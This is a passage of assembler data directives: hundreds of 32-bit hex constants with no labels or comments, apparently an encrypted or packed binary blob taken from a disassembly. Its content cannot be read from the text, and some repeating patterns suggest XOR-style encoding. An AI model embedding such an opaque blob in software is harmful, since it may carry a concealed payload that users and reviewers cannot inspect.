dd 8E5ED85Eh, 14816D47h, 0AD1CAC23h, 0A2B32FE9h, 0FF2CAA29h
dd 0E736D861h, 0BE54BB52h, 9404C240h, 0F5025FB7h, 53C2D266h
dd 8E07AEAEh, 0E7608A34h, 113BEA68h, 0F454D6C4h, 6B83FA78h
dd 6B23EAEh, 7A4C8FD1h, 4680F186h, 1EF6CE13h, 70F373F2h
dd 156ABF57h, 0B3ED3286h, 686C4F78h, 7DF6D73Fh, 19414AFEh
dd 3C830094h, 0C951029Ch, 66E463E4h, 42C5943h, 0DD072BE0h
dd 2EAC2AA8h, 0D454D250h, 0B55A1FF7h, 52959226h, 9E1C9810h
dd 0AE00D6DFh, 92323FD7h, 4967B206h, 8800A4ADh, 0C2869F40h
dd 0C4724A48h, 5D12D325h, 0E849A6D5h, 6B7D0160h, 0D87CEAFDh
dd 0A0A5F170h, 3EF82887h, 79B8A8Fh, 8A830A88h, 16941380h
dd 6BA62418h, 182464B0h, 2F2825A8h, 0B6B432B1h, 0CFC91A86h
dd 16FAC386h, 3B8B0481h, 901BD992h, 75935B9Eh, 668E332Eh
dd 91BF3CB9h, 40C86465h, 0BFC723F8h, 86DB070Fh, 0B818A08h
dd 96228C9Ch, 92749A72h, 0F624A220h, 0B8B9557Bh, 8B34840Ch
dd 0BE3CBA34h, 0C6FB474Fh, 7FA5CA48h, 5754D250h, 970E8A66h
dd 43E1ED36h, 6D6CEA68h, 0CAD8FAB6h, 67F8F575h, 3A840280h
dd 0A27F7FA8h, 939B28ACh, 1E9C1A14h, 6842F0Dh, 0F910A88h
dd 43C057D7h, 1E8096C7h, 38453EB5h, 3AA46A37h, 0D7A527A4h
dd 64AC59A6h, 0E914DCFh, 6E132D2Eh, 664E43FFh, 89FC7ADFh
dd 13FBD0E2h, 8E3AB1BEh, 0C6445223h, 97F4CA48h, 0E224A220h
dd 0C242DD47h, 0B650D35Fh, 821A2FC7h, 6C1C276h, 77FFC3Ch
dd 0EA0457D9h, 0B60DDA6Eh, 6664E060h, 0BE3ABB39h, 0CA5E678Fh
dd 6BF1FA4Eh, 6B21917h, 5A4539D8h, 47C642C1h, 4009E5C9h
dd 0A1A4149Bh, 0BB530EACh, 36820982h, 0B33CF940h, 46F257AFh
dd 240FB3C9h, 0A9D538D1h, 5AAFA5EBh, 0A661771Fh, 0B5DF309Ch
dd 7D47A27Bh, 0F3C02AFBh, 0B01939B5h, 82B60108h, 1D149211h
dd 9E1D9292h, 8DDCA120h, 65A7CAE3h, 0C25514C3h, 4BDEFD3Dh
dd 1C7ECABh, 2C79947h, 86805907h, 8F1CB00Ch, 199B8832h
dd 0D85718FDh, 90F97970h, 7D7CCC43h, 0C9AF0E44h, 0C98BE30Bh
dd 0FE947897h, 1DD39398h, 60EB7163h, 7CED7DFCh, 5FF96EF5h
dd 4DD348DBh, 1AB024AFh, 2AA2239Fh, 0AA725BFh, 2CAE2F9Bh
dd 30900C85h, 79F188Dh, 33A81C9Fh, 11900A80h, 8676E772h
dd 0E97EEB5Ch, 0F95CE675h, 9C1CEE6Bh, 0F374A220h, 0C7FC255Ah
dd 9850D142h, 0D859D342h, 0C628B26Eh, 850F8306h, 0AE3AB370h
dd 0A83EB12Dh, 0B531E80Eh, 8C4CB82Dh, 0B83DBD3Ah, 970ADC58h
dd 0CF176F2h, 0E8CE2DDh, 97C91290h, 28828475h, 4921E4A0h
dd 2EAC1CBDh, 0D3EA74Fh, 0D67D3A8Eh, 2CF836DFh, 0C79C1D6h
dd 0FD464EBh, 2BF26674h, 586504CAh, 4D997717h, 4AB2CF7Dh
dd 8777ACEh, 0E0A1D502h, 358907ADh, 1914A427h, 0A82B7B9Dh
dd 0E0AD5820h, 506226D2h, 543503CBh, 566C51F7h, 39BB3968h
dd 0C668B6CBh, 3E10A754h, 0DE5CDA50h, 0C827A433h, 0EE20A62Ch
dd 0CDE2678Fh, 3E77FA4Eh, 6C170FF4h, 9B73598Ah, 16A229AEh
dd 0F60FCA67h, 0D95BDC3Eh, 2EAC2140h, 75F261B0h, 10EF75E7h
dd 46880E84h, 755ADF37h, 0D53C52E6h, 0B623A526h, 991B94E6h
dd 7C3FE717h, 0BFC772C6h, 410CFF75h, 0D7558236h, 0DF5CDB59h
dd 3EBC341h, 9E2AA18Ah, 0A624A9C8h, 0EB7FFF28h, 98068162h
dd 0BE70F67Ch, 0FDD257BFh, 0C4A4CA7Eh, 0A154D250h, 0B72EAA2Bh
dd 0A702960Eh, 7B93BA68h, 0F642C94Eh, 0C53A7FF1h, 378B02B6h
dd 17F98705h, 931D12A6h, 1EAA26D4h, 0B031DDF1h, 0BDAC1C93h
dd 36B436D8h, 0BC09B7B8h, 1FC474D9h, 72FEF745h, 9F3C52E6h
dd 3823A52Dh, 7881E727h, 3EEC6ADEh, 6893D773h, 0F3FC7ACEh
dd 0B01AA795h, 0E458DA08h, 0C414F811h, 9E1C9870h, 90B15DA0h
dd 2B2C9C14h, 9441E8F0h, 0A06437B5h, 0AC16C276h, 0ABF9474Eh
dd 8254E44Eh, 8F0C8A0Eh, 0DCF11D32h, 0B66CDC54h, 0CA46678Fh
dd 7BBAFA4Eh, 6B23CD3h, 0E80E288h, 45C31290h, 2DD759D7h
dd 6AE00C92h, 0BB532AE4h, 36820926h, 3EBB522Bh, 0F34942C0h
dd 4EFA5211h, 5469DF89h, 0B6DC6CE4h, 991B97A4h, 6EEC6600h
dd 38BD25F0h, 2AB934B1h, 0CA48C62Eh, 18997508h, 1314A42Bh
dd 0AB9895D8h, 3524A222h, 0AE2CAF40h, 0A1813F30h, 0E73C8C21h
dd 0FA5A7FCDh, 0C3A4CA7Eh, 55AB2DA5h, 0E860F8E5h, 626BE260h
dd 0EE6CE878h, 0F7E41EF1h, 9628FA78h, 6840381h, 328E9F77h
dd 0D21512A6h, 1E9C1B08h, 4C70A9F0h, 0BB5378A8h, 36820E92h
dd 4BE5FA3Dh, 554C2ACDh, 0DB334AC8h, 56E26966h, 0E35FB833h
dd 66D27C87h, 0E3C51FE8h, 40EA1975h, 0EB032AF8h, 8632BE0Eh
dd 0A034A8Dh, 96149399h
dd 1510DA93h, 29145D20h, 9832CDADh, 0E5B17430h, 0BF3C8C06h
dd 0C72EC22Ah, 5BB3C822h, 0D662EE4Ah, 0D1A322DBh, 0E66582E4h
dd 7BE17968h, 0F642EC13h, 0AD2EEA12h, 3A8E977Fh, 0CE090ABEh
dd 17D4979Fh, 0A3111A98h, 26923CDDh, 6D442219h, 5E4BCD4Ah
dd 3EBC3A2Ch, 0CF22699Eh, 0B1986EFCh, 60EFDC45h, 0D561D7D8h
dd 0D7E454FEh, 94C882E9h, 0E3798D0Fh, 7ECA6480h, 926C826Ah
dd 0DC0C8A08h, 80816D43h, 131CAC24h, 2B308664h, 98135ABDh
dd 3BE230h, 9A783132h, 0CEA40354h, 0DC4D804Ah, 9C46D01Ah
dd 0FA18D15Bh, 0E9856268h, 0BF640AA9h, 0E650B67Bh, 732CC887h
dd 30B8563Dh, 0E90E288h, 38B11290h, 30BC62AEh, 1C840C80h
dd 890F8Dh, 4E914A88h, 34CF1F98h, 88D0D8Ah, 0B19B4AE8h
dd 60EF1445h, 0F218DBD8h, 0CE462E0h, 3DBB3AE8h, 4AE2E70Fh
dd 0F3777ACEh, 86329788h, 95EF8A62h, 0C7195B7Bh, 9E1C9FF0h
dd 0C2018420h, 517BAA22h, 800FF4A5h, 0B2F83938h, 0AE4F2910h
dd 0CE4CCA4Fh, 0C8C56FDDh, 8D0BDA6Eh, 0DA72779Fh, 2EE9EA5Eh
dd 43F9A60Eh, 0FE4AC62Ch, 130CA703h, 838C0ABEh, 20AA411Dh
dd 74523198h, 75F273A0h, 12BEBF57h, 0CE373286h, 0AF9344B8h
dd 0F349BC4Bh, 4EFA769Ch, 0F8265F60h, 0B6BC4AADh, 991B98D1h
dd 8DFB1889h, 7783FFF9h, 0B1779013h, 3B894C2Bh, 8E3AB65Ch
dd 619336E3h, 614F23F3h, 9018A4B5h, 0C1912A28h, 0B7348425h
dd 8E54904Ch, 3944C235h, 0F8777CDDh, 85E95250h, 0DE5CEC66h
dd 63A3F314h, 0EE5AF40Fh, 0F674F270h, 0C02F7FBEh, 0EF8402B6h
dd 0F173F480h, 3EC9757h, 1E9C1AAEh, 0E4F9A2A0h, 24A12AACh
dd 59DA12FFh, 519C54D7h, 2FA862A6h, 6EED2FAEh, 3FA0729Fh
dd 2AFC3FB5h, 387428Fh, 1C8E0F84h, 57910691h, 5EDC70F5h
dd 0C924A220h, 0E379F928h, 0B666F77Dh, 0FA6EFB7Fh, 0AB05CC45h
dd 0C249F822h, 0DA40DC55h, 0D24FC95Dh, 0A72CE239h, 0EE35BA38h
dd 0F630BC31h, 0BB2CA23Dh, 88059603h, 9D4CC61Ch, 921A9304h
dd 0C41B9411h, 0C892FA0h, 6DF86BDFh, 71FA7BF8h, 72F07BB8h
dd 5FC54680h, 4AC24B88h, 51DD5C90h, 1E904ED0h, 66B62DA6h
dd 2BA538AEh, 76A736BEh, 3FAB7A91h, 6BDE1689h, 0B843DE2h
dd 17D41782h, 7DC1F8Ah, 0A628F76Fh, 0EB65F86Eh, 0A967F67Eh
dd 0F373D938h, 0EF048345h, 0DD458A5Ch, 0DB5DC610h, 0F71C9B5Dh
dd 0E637E534h, 0AB38AB24h, 11D0D671h, 7848F368h, 0ED1E5670h
dd 4878F96Dh, 988D9860h, 5525AD18h, 0B77EE7BAh, 0F93C51AFh
dd 0FDFC03B0h, 2375A94Eh, 0BF09650Fh, 154C92CAh, 8E076032h
dd 3EBC3A60h, 46C442C0h, 4ECC4AC8h, 56D452D0h, 5EDC5AD8h
dd 66E462E0h, 6EEC6AE8h, 76F472F0h, 7EFC7AF8h, 86048200h
dd 8E0C8A08h, 96149210h, 9E1C9A18h, 0A624A220h, 0AE2CAA28h
dd 0B634B230h, 0BE3CBA38h, 0C644C240h, 0CE4CCA48h, 73D7B250h
dd 0DE6AE598h, 22C16160h, 0EE6CDC57h, 0E237457Fh, 0F164A9F5h
dd 5824937h, 2AC88158h, 1AD639B4h, 5CA703EAh, 0ADB051A8h
dd 6C873EEAh, 0F621BBBCh, 0B7BC0C87h, 70FB8645h, 0CDC9A1C8h
dd 8F367A12h, 5ED898B9h, 42B4E768h, 0A046ADEh, 1EF472F0h
dd 7EFC7AD8h, 0A579078Dh, 0B7558A3Eh, 1518E608h, 69FE9ED8h
dd 998427DFh, 59EFAA1Eh, 0E6B9B1E9h, 5D3C8C1Ch, 3A343D50h
dd 26CFCAC7h, 5FA23054h, 0E87FA7C5h, 0E65E6160h, 0DC47EF1Ch
dd 7B648073h, 0A5240636h, 6BE81DEh, 3C730EFCh, 646B117Bh
dd 0E1CBF288h, 0E88FDD5Fh, 1168A783h, 35EC3286h, 0B17F0EF3h
dd 70FBE645h, 0EE498DC8h, 56D464EFh, 0B6DC5AD8h, 66E462DCh
dd 514CEF63h, 0C61C72C6h, 9603850Eh, 86048218h, 0B1AC378Bh
dd 0E3149226h, 67811310h, 4D249403h, 0EA155B4h, 7534840Fh
dd 81983FB7h, 53CDC276h, 0CE7AF5E8h, 0D654D1B8h, 1D95E958h
dd 0E6E471EBh, 63EEA68h, 98B0C9Dh, 0C1B86F7Bh, 0D08702B6h
dd 0E80700Bh, 1793969Fh, 641F1A98h, 0A2AB22B0h, 2EAC2A55h
dd 66B8703Bh, 0C142F250h, 8241413Fh, 4DCC7CF7h, 5E5E0216h
dd 2ADCA358h, 481DE2F9h, 85AC699Ch, 77BCF901h, 0A1239B79h
dd 7F855DDFh, 8E40C64Ch, 0BD4D7E65h, 64E519D0h, 0A6932D2Fh
dd 2F4AAA28h, 84074C48h, 0BE973F37h, 4512C240h, 0CB39CA72h
dd 3D4498DBh, 0DD56515Ah, 948CB391h, 0ED931596h, 0C04B36C5h
dd 3EF95778h, 828BF9F8h, 0E8C0A0Ch, 2950A76Fh, 0F6CC1AAEh
dd 0D95BDCF5h, 1168AFABh, 0B33B3286h, 3E8A057Ch, 15E046C3h
dd 7DCE8A4Bh, 5E625D0Bh, 975C483Bh, 422531C0h, 72C56ECCh
dd 52F85BD4h, 97173AA3h, 510B7981h, 0B07857B3h, 0D3BC6991h
dd 0A8684176h, 9D7D59A1h, 80585589h, 94E249B1h, 9848168Dh
dd 2FD739C1h, 0D0383910h, 3F2929D1h, 0C8282900h, 0D92219E1h
dd 0E0180B4Dh, 0C94409F1h, 0F8081B5Dh, 3920977Fh, 0E7D70ABEh
dd 0E96BEDE1h, 0A5E99C6h, 0D95ACD49h, 44ACE957h, 665C6AB4h
dd 0B643C54Dh, 70E26855h, 7F742CC8h, 963650C8h, 0BCDE593Ch
dd 608EC986h, 9BD982B0h, 0B4778D0Fh, 142DFDF0h, 0AEECDA05h
dd 0EF375FDh, 9D6791EAh, 1B1ECAA8h, 0A612840Ah, 0C40B4182h
dd 369EEA58h, 0A649B9C2h, 0CEACD3F0h, 76B335BDh, 0D654D251h
dd 0D32808DCh, 2C9A02B1h, 0EB871C83h, 0F674F2C8h, 419E51F8h
dd 9A118F43h, 258C3CB0h, 0D54EE547h, 26139F6Fh, 26A42296h
dd 0BBA322A8h, 3D54F370h, 631BF4Eh, 33C542F6h, 0C7C12CCEh
dd 0A0C7B9F5h, 68E4D75Dh, 609160E0h, 4BDD678Eh, 7B92761Bh
dd 0D59A5FF9h, 79FB3EE8h, 0BA4F01F7h, 0A9AC0799h, 5DB79A2Eh
dd 9EAB27D7h, 0AE2CAA1Eh, 233BBA30h, 1480BEF8h, 39BB5EA8h
dd 72D943B7h, 2054E46Fh, 0E86457DDh, 0E211E360h, 0EC87DB67h
dd 35DF325Bh, 0C6F37F8Fh, 68402B6h, 29F80288h, 2E1D971Ah
dd 0FE5D1AAEh, 0ADA944ABh, 9E074CEDh, 0B33E9848h, 3E8A0231h
dd 43DFA201h, 48452EAFh, 3014617Bh, 0E6CEB173h, 66E1ED84h
dd 0E769E043h, 72F444C8h, 661CBBA0h, 7AB441ABh, 366AAAE3h
dd 3D7292FBh, 9A7683F3h, 523D4A78h, 0AAA155D7h, 0BED473E2h
dd 7EB5BF5Eh, 0C5AF6926h, 0A4E65AF8h, 0D6BC8A52h, 5AA325ACh
dd 8C5696B2h, 1A84B260h, 88B0D83h, 8ABF88B2h, 724EFC45h
dd 7A46F441h, 625EEC4Bh, 6A56E494h, 526EDCACh, 0C5559AA4h
dd 0DD49827Dh, 0D5498A71h, 0AD3CF205h, 0F3418909h, 56E26A4Ch
dd 6653DF2Fh, 66E462D6h, 6D98EAE8h, 815E1240h, 48C4F57Dh
dd 86048200h, 360BFE00h, 96F81945h, 1BEBD5B3h, 0A6129AAFh
dd 0AF2CAA2Bh, 0B6E3363Fh, 568CBA38h, 7BCD69EAh, 0CE7AF5E0h
dd 7DFE3AE0h, 0E1F067D1h, 6393E256h, 0EE5AD2E7h, 0F674F273h
dd 7B8BEF0Ch, 6B23A0Fh, 0F8C0A88h, 0D77C17E4h, 0AE63E566h
dd 0AD0F8849h, 1893822Dh, 1D7BB9B0h, 8E01B370h, 0CFC474FFh
dd 2974B680h, 0FDE2ADB4h, 0F5BA9AEBh, 5E6BE717h, 6EEF6ADEh
dd 788072F0h, 4671FF0Eh, 0F2848236h, 704E620Dh, 0F1AC6DEFh
dd 353A137Ch, 0D426213h, 96A32FDFh, 0B637B206h, 0EB48BA38h
dd 0FEC947B6h, 0BBCCCA7Eh, 284A3A55h, 7AB425A7h, 569B1D9Dh
dd 15DA0248h, 0CF970D8Fh, 0EB83421Eh, 0AD15A9E6h, 36039F03h
dd 0C46312A6h, 1E9FD86Fh, 32D122A0h, 0D1515440h, 0DEAB824Fh
dd 0C143C128h, 533BFAA6h, 0E55DE1AEh, 0D35F9D5Bh, 5EEA6568h
dd 2E6DAACBh, 0E1699D14h, 75F444C8h, 0AFC7AF8h, 981752Eh
dd 8E0CBC30h, 0E2129210h
dd 11996D3Ah, 0A6249418h, 0DB2DAA28h, 4BC65A35h, 3BCB45C7h
dd 0C672FACFh, 0CA4CCA48h, 0DBBCD724h, 29A325A6h, 0D05C6DE5h
dd 0EE6CEE68h, 1E638670h, 183041Fh, 0F8442B38h, 634A140h
dd 0BD906650h, 0F5646F20h, 0A35389C7h, 2E9A1227h, 36B432B8h
dd 833C75CDh, 46F27A4Dh, 0A68A3EC8h, 0A92BACEBh, 77C47360h
dd 0EF416829h, 0AEEC5CD0h, 0D3FE7114h, 7ECA4271h, 2CB532ABh
dd 0B6810F82h, 26BE9226h, 17999058h, 0C249418h, 53CE124Eh
dd 8EBB37C7h, 0BE2CBA0Eh, 0C130C240h, 0A8E683F8h, 0B0A8A7E8h
dd 74B46AF3h, 6FCF2253h, 0D8537ED5h, 79F10570h, 0DE7CCC40h
dd 73840280h, 4D4BA81h, 20AC9515h, 0A6FAB098h, 0A353E221h
dd 2E9A1227h, 36B432F0h, 0FA3C39CCh, 0C16148E8h, 28CC7CF0h
dd 0CE69DB7Bh, 0F5DC6CE7h, 5E6BE717h, 6EEC6ADEh, 7F8132F0h
dd 0FBFE2A48h, 8632BA87h, 1897DA2h, 1614A428h, 0EB1C9A18h
dd 0AC9C122Bh, 981422ADh, 8BDF1830h, 0A60D025Eh, 0FECB47B7h
dd 0CF4CCA7Eh, 0D420D250h, 7B56F3E8h, 0E652DAE8h, 0E46F0EA8h
dd 0C04C7AD5h, 98D79C78h, 0F1748338h, 38B4850Dh, 16961290h
dd 0AA9E6F98h, 0AE012868h, 48AC1C90h, 8209BB1Bh, 86BC0C87h
dd 46C46A5Ch, 0C149BD63h, 5ED464E8h, 2ADC5AD8h, 9BD58A91h
dd 0EB1B9517h, 76C24A7Fh, 7EFC7EF8h, 3EB48975h, 0B6850F02h
dd 7DBE9226h, 11996D55h, 0A6249418h, 0DB2CAA20h, 358CD421h
dd 3799B0D8h, 0A044F478h, 648CF9E3h, 6E32C7BBh, 7B56C271h
dd 0E652DAE9h, 0E46F0EA8h, 0C04C7BD5h, 9D79C78h, 30BC8D05h
dd 0E9C0A88h, 972C7490h, 9E9F6E58h, 83AE2A64h, 2E9A1221h
dd 80BB99D6h, 884B73Dh, 862CE9C0h, 0B933B534h, 60ECDD55h
dd 5EDC5AD8h, 0D6ED16A0h, 0E96968B8h, 0DCF444C8h, 4673FF0Fh
dd 0A6048236h, 8BC8A08h, 92109065h, 14E2D595h, 901C2585h
dd 32A12328h, 0D034840Fh, 0BBC03A93h, 0C6F4C535h, 8EB385C8h
dd 2A2D3AFAh, 5BAB25A7h, 0E652DAEFh, 0EE6CAA68h, 0C7124A16h
dd 0D7C8F80Dh, 1E34A9E6h, 36058F82h, 0F65412A6h, 4A74B09Bh
dd 965BDD5Ch, 0A129DD20h, 36B40488h, 4BBC3A38h, 0CC42F2C2h
dd 78F4CD6Dh, 0D67F34D0h, 59A95F24h, 29646250h, 86462A17h
dd 890B8EDBh, 4673FF0Fh, 86048236h, 85798A09h, 131ED2A0h
dd 9E2AA29Fh, 0C02B498Ah, 0A4EC2990h, 800C3595h, 0E97DC38h
dd 43B36841h, 0CE7AF2C7h, 0D656D250h, 5BABF52Dh, 0E652DAEFh
dd 0EE68EA68h, 36C4E805h, 0C6F57F72h, 0A30E02B6h, 0EBA3206h
dd 7084F251h, 0B51D7C20h, 2E4F2210h, 0ABA66A18h, 36820A39h
dd 0B139CD12h, 46C474F8h, 3BCC42C8h, 0D56C34C0h, 0D6795030h
dd 0E454D8h, 85EDDA43h, 7CBCC2F8h, 48C4F27Dh, 3F32800h
dd 8E3AB287h, 96049210h, 0BB69EFA9h, 5EA71A46h, 96A40F22h
dd 1D52B206h, 97967A0Bh, 0F07B5EFDh, 41C93D48h, 0D654E468h
dd 0AB5CFA58h, 0D13537Fh, 0E7D48C73h, 7ED1F868h, 3E7CCC40h
dd 0A38E0164h, 0EBA3200h, 0ABBDB9F6h, 1EAA2504h, 832EE32Ah
dd 2E9A1534h, 6E0499D6h, 63BBFBAh, 0B16E42F6h, 78F4C54Dh
dd 56D451D0h, 0A9FE2ED9h, 50DCED65h, 6EEC6AE8h, 81E207F4h
dd 48C4F57Dh, 86048200h, 6609FF0Bh, 69EB6894h, 61E631F0h
dd 29A155DFh, 0AE2C9C10h, 0C23CB230h, 14F50A3Bh, 0FECB47B7h
dd 0CE4CCA7Eh, 0F6205250h, 5B76DDE8h, 0E652DAE7h, 0E3760AA9h
dd 0F650FAF9h, 0C6FB5F7Ah, 0E24402B6h, 0A488A8Bh, 0BCF5A23Bh
dd 0FE63A2FEh, 1E2387AAh, 85CA2A9Eh, 0E3BB747h, 3E9C3A8Eh
dd 15B042C0h, 7643CF3Fh, 56D452E6h, 53A87AD8h, 66E7A517h
dd 6B986AE8h, 9D5EE240h, 0F53BF10Bh, 0B03B168Dh, 7CDA108h
dd 0CEA46E51h, 0A69B1F12h, 518EA216h, 981425ADh, 0F634B230h
dd 0D830CE38h, 0CC8792F8h, 0F8744DCDh, 0B05E3950h, 0D4BC25E0h
dd 0D05C65C5h, 19C78C68h, 0C04C7DF5h, 0FE7CF978h, 0F1F77681h
dd 38B4850Dh, 16941290h, 0E9916EB8h, 26A42167h, 9EA95EA8h
dd 0C55F9820h, 0BB37F533h, 46F27D6Ch, 64582E3h, 0A11D612Ch
dd 68E4D55Dh, 0E6E462E0h, 0E3E21FE8h, 40CCF575h, 3EF4F0F8h
dd 0F5077B80h, 430807F0h, 9604B654h, 2E147AD9h, 0A0C709ABh
dd 6E1D124Eh, 0E521956h, 6543AB7h, 0C444C240h, 96E7ACA9h
dd 0A39D57FBh, 0EFE4BC5Eh, 56CF84A0h, 6BE140ABh, 0F642CAECh
dd 0C6F37F8Fh, 68402B6h, 8F91A88h, 4E6C39C7h, 4D170373h
dd 0D5C0988h, 9A21A178h, 37B4048Fh, 883AE2Dh, 0CDFD43C0h
dd 0C7C86E8Ch, 60C43B6Dh, 0C661D1D8h, 4DE454DFh, 58D3FE6Dh
dd 0F97185F0h, 3EFC4CC0h, 0F2048200h, 25D47D0Ah, 0C01496D2h
dd 52A1194Fh, 0A624941Fh, 0AFF52E27h, 0BBDCB230h, 0F53CBA38h
dd 830A9005h, 0E07EF904h, 0D6189E14h, 0E5224FA7h, 63EDE256h
dd 0EE5AD588h, 0CA2C7923h, 8D83227Bh, 32C789A8h, 0F179EA60h
dd 0D601996Fh, 459C2CA7h, 0AFA860A3h, 1893CE2Dh, 3EF631B0h
dd 154BF31h, 354F42F6h, 0CE7FB5E0h, 0BED452D0h, 0A123AF61h
dd 5924DF6Bh, 86BA6ADEh, 890B875Dh, 413CEF73h, 0CC8F8236h
dd 82468900h, 7F975C3Bh, 0FE94951Dh, 0A924A221h, 0AE2DF0ACh
dd 7281B130h, 0BD3C8C07h, 0F07B46F5h, 26706648h, 0D6F6575Fh
dd 98D1DA58h, 62E1C964h, 0ED6CDC57h, 9C9CA276h, 7D83058Dh
dd 30BBC23Dh, 5F90A88h, 199855ABh, 1E9D011Bh, 1FA8C9A0h
dd 1893EA3Dh, 3B313DB0h, 3DBC3AB9h, 70FBC645h, 764D2CC8h
dd 0D3DB772Fh, 5EDC5A24h, 4DE6226Bh, 86BC5EABh, 890B87DDh
dd 413CC7C1h, 30B8236h, 8E0C8AECh, 0A9D01713h, 1B1F9A2Eh
dd 0A6129DA4h, 0E907AAA3h, 7BB6BD3Ch, 853CBA38h, 454BCA07h
dd 0CE4CCA8Ch, 0D55612D3h, 5B5FCE1Fh, 0E652DDE4h, 5B93BA3Ah
dd 0F642CD90h, 0C5426F87h, 83DE02B6h, 0B9090548h, 0FF941290h
dd 1E9C1A04h, 0A3ABDD9Ch, 2EAC2A3Ch, 39A10C30h, 3EBCB13Dh
dd 4782C9C0h, 1EF809E3h, 0A920EE38h, 9E616327h, 13E454DFh
dd 0AA69699Fh, 75F444CFh, 48C3FE7Dh, 6A810B00h, 50CBC37h
dd 7291A910h, 0EC1CAC27h, 4EA19928h, 0DC2C9C17h, 0B6348F59h
dd 894ECA38h, 0C644DDA8h, 32024748h, 0D47F13DBh, 0E54C985Bh
dd 0D05B0EE5h, 6D609F68h, 0C78BE2B4h, 0E258BEF7h, 0C59FE9E1h
dd 31288F07h, 9DF412A6h, 28A39E2Dh, 0D3FECAA0h, 87CDD557h
dd 0B6B432B0h, 799734CDh, 7DCD30CCh, 0CCC3428Fh, 0A92BADECh
dd 0EC595591h, 0ED1B9D1Eh, 0C96D4ED4h, 76F45A7Fh, 1038507h
dd 0CC85C0EBh, 8E0CEA2Ch, 5627DCF0h, 19389693h, 901B6EA5h
dd 66A92328h, 3B34840Fh, 0BE142981h, 42C1C140h, 0A84CFC77h
dd 0FD1A77F5h, 0CA1ED99Eh, 2068A04Bh, 2984112Eh, 0F674A6F1h
dd 0FE7CFF78h, 0FAC28B80h, 594F54D7h, 2D1E876Fh, 0F65D1AAEh
dd 3C212DBFh, 7EAC2AA9h, 5C9C58E4h, 0D429C547h, 0C3C474FBh
dd 0C6C31508h, 56D453D5h, 0A1390030h, 66F58A1Fh, 0BBF6AE8h
dd 1A9D3484h, 1D99299Dh, 0F26DF075h, 710CCB71h, 0A02BCAA5h
dd 0A0896518h, 2F24941Bh, 9813CAADh, 0B62D5A30h, 0DB6FBA38h
dd 0A32FA314h, 0AB22BD07h, 0BF3CA122h, 0B72E8A28h, 83088B16h
dd 0B96C8F0Fh, 99DD998h, 0FE6F1287h, 63D70280h, 7AFF6FDAh
dd 46F160FFh, 77EA73EAh, 43C347CCh, 23447DA8h, 0DE4BCD59h
dd 3EBC3AAAh, 27862793h, 3EB921ABh, 20BD2080h, 39B936B1h
dd 8EB36285h, 91138218h, 76F46A18h, 3D9929F8h, 0E16AE368h
dd 0FA63C46Dh, 0C66DF479h
dd 0F76AF36Ah, 0C343C74Ch, 63C4FD28h, 0E6CB4DD8h, 22B9376Ch
dd 0AC44F47Ah, 0CF269A2Ch, 20C12D07h, 575CEC63h, 739BC65Ch
dd 0EE5AD15Ah, 4BF9325Ah, 0FE4AC42Ch, 0F9D452D0h, 38B6963Dh
dd 16957A90h, 74C81A9Ch, 0B35B75A1h, 2E9A15C8h, 61B058E4h
dd 1DCAF47h, 824742F6h, 1679B5DCh, 0A9D464EFh, 68E7344Dh
dd 0EB273DE0h, 58D23E5Dh, 0E30B24F0h, 7ECA418Ah, 89FB7A83h
dd 8E0C318Ch, 0F2911B10h, 0F41CAC27h, 33DBF420h, 0AE1A9186h
dd 323B72B5h, 0BE3CBA9Ch, 9614026Bh, 0A41CC922h, 0D654BA51h
dd 210A1A58h, 0D05FACF5h, 11946968h, 0F39C767Fh, 7BF5FA78h
dd 6B23DE8h, 31E08705h, 831912A6h, 1EAA25ECh, 26CE70F1h
dd 5439D5F8h, 0B5B4048Bh, 0BAB3C540h, 46C44776h, 0FB334AA2h
dd 56E26DB8h, 65AACF27h, 9E6762D6h, 0F1686517h, 0FFF472F5h
dd 48C3067Dh, 85CDB100h, 0DF5CDBCBh, 6945967Ah, 0A823F2ADh
dd 0F4B15D20h, 2B2C9C13h, 0CDB0BDF0h, 8D3CBA3Dh, 46C14B89h
dd 9F4CFC77h, 0C93C8301h, 8E5CD558h, 0DDFE779Fh, 2EE9EA5Eh
dd 0F340767Fh, 7BF5FA78h, 6B23D04h, 617FB24Bh, 5D1F1290h
dd 9119EDA0h, 26A41498h, 5BBC2AA8h, 5F3131B6h, 0DBC0CA8h
dd 0B1054112h, 0C72DBD39h, 60EBC255h, 7647E2D8h, 2D6F62E0h
dd 76969D4h, 45F444E0h, 893D792Ah, 0FE575F1h, 0B833028Dh
dd 211B5110h, 7DE59C53h, 0BE772F15h, 0BA6F1D27h, 0DD7D6233h
dd 6E3F92F9h, 0B11BF8C1h, 0BAB5A421h, 0DA2E514Dh, 55BCA859h
dd 0A4EFDE2Bh, 0FE2EE97Ch, 93CB6FDh, 3F5F238Fh, 39F887BBh
dd 854F0ABEh, 258436C4h, 0A61E9558h, 0E5A422A0h, 2547E523h
dd 8E08F3Dh, 0B5403A8Eh, 0EA0D711Fh, 48BE2BF4h, 54A328ECh
dd 62767AF4h, 5A0816BCh, 52311EC6h, 951C07F0h, 43FDF131h
dd 8641DA45h, 0DD31817Ch, 9914C053h, 61E3A99Dh, 9B2729DFh
dd 0ED62E37Fh, 4912363Fh, 0E90145C7h, 0C90A9703h, 31B3D1CCh
dd 9503EFAFh, 5A53E86Bh, 199B1D70h, 0BA3FBA55h, 0F3F0FD3Fh
dd 0CD830587h, 0F8A9EA5Bh, 1EF9F577h, 0E968E878h, 0E0BDF267h
dd 0A2ABDD5Fh, 0D153D444h, 205CE083h, 0D6BC3AB8h, 0B93BBDA3h
dd 4ECC4A20h, 0BB550FD0h, 5EEA69E5h, 66E7B909h, 5C130EE8h
dd 4970C77Bh, 0F7987ACEh, 0B885E422h, 0B03D045h, 961491D4h
dd 9D20C493h, 9DA5C4FEh, 2B23EF78h, 0B634B184h, 0BE2AF9CFh
dd 0C944C260h, 0CE4F6DCDh, 8A172450h, 43D8D55Ah, 6D64E263h
dd 4E51E22Bh, 0F9D452D0h, 0FE7F75FCh, 26A43F80h, 8A832AA8h
dd 16941114h, 0E162A370h, 5F262D5Fh, 0ADAC2AABh, 8BFA15h
dd 7C373AB8h, 568EC9C8h, 4ABF8BE3h, 533F92E3h, 145592DBh
dd 0EA61EBF0h, 6DEC5CD7h, 764C7EBAh, 2FFC7BF8h, 79E328E8h
dd 399BAF7h, 2714A428h, 10A9AA38h, 0CC249418h, 0F6E55408h
dd 26DCA648h, 3BC345DFh, 4D0CD92h, 5B7D289Bh, 0D662EADFh
dd 5BAB3FB3h, 0E652DAEFh, 0EF6CEA68h, 7383D004h, 0FE4AC2F7h
dd 6840283h, 0AB0D06FDh, 16A22A1Fh, 0E563E567h, 0AB25284Bh
